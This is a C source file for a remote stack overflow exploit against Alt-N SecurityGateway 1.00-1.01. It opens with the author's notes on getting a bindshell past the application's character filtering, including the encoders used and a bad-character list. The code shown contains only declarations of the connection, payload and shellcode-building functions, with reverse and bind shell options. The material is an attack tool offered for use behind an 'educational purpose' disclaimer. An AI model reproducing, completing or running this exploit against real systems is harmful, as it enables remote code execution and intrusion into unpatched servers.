Alt-N SecurityGateway v1.00-1.01

* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is peace a cake job.
* To make a wroking code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the beffer gets
* lowered so the overflow should not contain upper chars :( . So i decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper use the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body contained
* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
* After few days of work i have comed with the required bindshell which bypass
* all restricted chars and executes. Thx to skylined, for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/

#include
#include
#include
#include
#include

#pragma comment(lib,"ws2_32")


void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);